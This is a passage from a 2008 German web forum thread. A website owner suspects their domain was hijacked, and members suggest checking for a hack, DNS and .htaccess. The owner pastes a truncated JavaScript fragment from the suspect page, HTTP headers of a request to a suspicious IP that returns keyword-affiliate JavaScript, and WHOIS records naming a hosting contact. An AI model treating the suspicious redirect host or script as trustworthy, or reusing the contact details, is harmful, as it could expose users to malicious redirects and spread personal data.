height=4><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=5><tr><td></td></tr></table></td><td><table width=4 height=6><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=7 height=7><tr><td></td></tr></table></td><td><table width=16 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=5 height=4><tr><td></td></tr></table></td><td><table width=4 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=7><tr><td></td></tr></table></td><td><table width=3 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=1><tr><td></td></tr></table></td><td><table width=6 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=1><tr><td></td></tr></table></td><td><table width=2 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=9><tr><td></td></tr></table></td><td><table width=13 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=5><tr><td></td></tr></table></td><td><table width=3 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=16><tr><td></td></tr></table></td><td><table width=4 height=8><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=5><tr><td></td></tr></table></td><td><table width=5 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=0><tr><td></td></tr></table></td><td><table width=4 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=7><tr><td></td></tr></table></td><td><table width=11 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=16 height=10><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=7><tr><td></td></tr></table></td><td><table width=15 height=6><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=12><tr><td></td></tr></table></td><td><table width=13 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=1><tr><td></td></tr></table></td><td><table width=0 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=2><tr><td></td></tr></table></td><td><table width=3 height=9><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=6><tr><td></td></tr></table></td><td><table width=4 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=6><tr><td></td></tr></table></td><td><table width=7 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=6 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=6><tr><td></td></tr></table></td><td><table width=12 height=10><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=3><tr><td></td></tr></table></td><td><table width=0 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=5><tr><td></td></tr></table></td><td><table width=3 height=8><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=10 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=3><tr><td></td></tr></table></td><td><table width=13 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=0><tr><td></td></tr></table></td><td><table width=4 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=16><tr><td></td></tr></table></td><td><table width=3 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=7><tr><td></td></tr></table></td><td><table width=3 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=2><tr><td></td></tr></table></td><td><table width=1 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=5><tr><td></td></tr></table></td><td><table width=0 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=10><tr><td></td></tr></table></td><td><table width=1 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=1><tr><td></td></tr></table></td><td><table width=13 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=5><tr><td></td></tr></table></td><td><table width=15 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=0><tr><td></td></tr></table></td><td><table width=2 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=8><tr><td></td></tr></table></td><td><table width=10 height=3><tr><td></td></tr></table></td></tr></table></td></tr></table></div><script language="javascript">var r=new Array();var rows=document.getElementById('myDynamicInterface').childNodes.childNodes.childNodes;for(var i_row=0;i_row!=rows.length;i_row++){var tds=rows[i_row].childNodes;for (var i_td=0;i_td!=tds.length;i_td++){var td = tds[i_td];if (td){var jtrs=td.childNodes.childNodes.childNodes;var jtds=jtrs.childNodes;for(var j_tr=0;j_tr!=jtrs.length;

Member: iVirusYx
iVirusYx Mar 11, 2008 at 00:57:55 (UTC)
Ja, wenn der Code der fremden Seite auf deinem Webspace liegt dann wurdest du gehackt und musst wahrscheinlich von vor anfangen wenn du keine Backups machst.

Wenn alles auf deinem Webspace vorhanden ist dann würd ich doch mal bei den Einstellungen deines Domainennamen nachkucken ob der Link richtig ist?!
Mitglied: 35801
35801 Mar 11, 2008 at 01:15:42 (UTC)
Hallo! Danke für die schnelle Antwort!

Am Webspace ist kein Fremdcode vorhanden...

Kann jemand vielleicht von außen die DNS-Records von meinem Provider maipulieren?
Mein Techniker und ich haben schon am Web-Space nachgesehen und konnten nur unsere Dateien finden. Oder kann man die Index-Seite auch in einem Unterverzeichnis verstecken und den Server zwingen die Index-Seite im Hauptverzeichnis zu ignorieren?
Member: kuechenchef
kuechenchef Mar 11, 2008 at 07:17:34 (UTC)
Wie sieht die .htaccess Datei aus??
Member: Frt001
Frt001 Mar 11, 2008 at 08:21:00 (UTC)
Wie sieht die .htaccess Datei aus??

Genau oder schau mal, ob dein Provider eine 301 permanente Umleitung eingerichtet hat.
Mitglied: 35801
35801 Mar 11, 2008 at 12:52:50 (UTC)
Die .htaccess
AddHandler application/x-httpd-php5 .php
AddHandler fcgid-script .php
FCGIWrapper /usr/local/cpanel/cgi-sys/fcgiwrapper .php

Die .htaccess.addHandlerBak
AddHandler php-fastcgi .php
Mitglied: 35801
35801 Mar 11, 2008 at 13:07:33 (UTC)
Hier noch mal die Http-Headers:
http://207.10.234.222/f.php?keyword=insurance&subaff=187655&ref=http%3A//www.powerdruck.com/&rand=0.13187894505255338

GET /f.php?keyword=insurance&subaff=187655&ref=http%3A//www.powerdruck.com/&rand=0.13187894505255338 HTTP/1.1
Host: 207.10.234.222
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Accept: */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.powerdruck.com/

HTTP/1.x 200 OK
Content-Type: text/javascript;charset=utf-8
Server: Apache/1.3.37 (Unix)
Connection: close
----------------------------------------------------------
http://toolbarqueries.google.de/search?sourceid=navclient-ff&features=Rank&client=navclient-auto-ff&googleip=O;209.85.129.147;406&ch=8866c9f4c&q=info:http%3A%2F%2Fwww.powerdruck.com%2F

GET /search?sourceid=navclient-ff&features=Rank&client=navclient-auto-ff&googleip=O;209.85.129.147;406&ch=8866c9f4c&q=info:http%3A%2F%2Fwww.powerdruck.com%2F HTTP/1.1
Host: toolbarqueries.google.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12 GoogleToolbarFF 3.0.20070525
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PREF=ID=dc247361df8f8881:TM=1203115101:LM=1203115101:S=iatppTRVjPzfOa82

HTTP/1.x 200 OK
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: gws
Transfer-Encoding: chunked
Content-Encoding: gzip
Date: Thu, 28 Feb 2008 22:33:31 GMT
----------------------------------------------------------

WHOIS:
Registry Whois

Domain Search:

OrgName:    PaeTec Communications, Inc.
OrgID:      PAET
Address:    One PAETEC Plaza
Address:    600 Willowbrook Office Park
City:       Fairport
StateProv:  NY
PostalCode: 14450
Country:    US

NetRange:   207.10.0.0 - 207.10.255.255
CIDR:       207.10.0.0/16
OriginAS:   4231,  4969,  1785,  15270
NetName:    PAETECCOMM
NetHandle:  NET-207-10-0-0-1
Parent:     NET-207-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.PAETEC.NET
NameServer: NS2.PAETEC.NET
NameServer: NS3.PAETEC.NET
Comment:
RegDate:
Updated:    2007-09-20

OrgAbuseHandle: ABUSE741-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-877-340-2600
OrgAbuseEmail:

OrgTechHandle: IP43-ARIN
OrgTechName:   IP Administrator
OrgTechPhone:  +1-877-340-2555
OrgTechEmail:

OrgName:    SAID INC
OrgID:      SAIDI
Address:    15 N 7 ST
City:       PERKASIE
StateProv:  PA
PostalCode: 18944
Country:    US

NetRange:   207.10.224.0 - 207.10.239.255
CIDR:       207.10.224.0/20
NetName:    SAID-INC
NetHandle:  NET-207-10-224-0-1
Parent:     NET-207-10-0-0-1
NetType:    Reassigned
Comment:
RegDate:    2007-05-30
Updated:    2007-05-30

RTechHandle: ASI25-ARIN
RTechName:   Siwert, Art
RTechPhone:  +1-215-257-3110
RTechEmail:

OrgTechHandle: ASI25-ARIN
OrgTechName:   Siwert, Art
OrgTechPhone:  +1-215-257-3110
OrgTechEmail:

# ARIN WHOIS database, last updated 2008-02-27 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

TRACE:
Host name: sr60.24ruhost.com.
IP address: 207.10.234.222
Location: UNITED STATES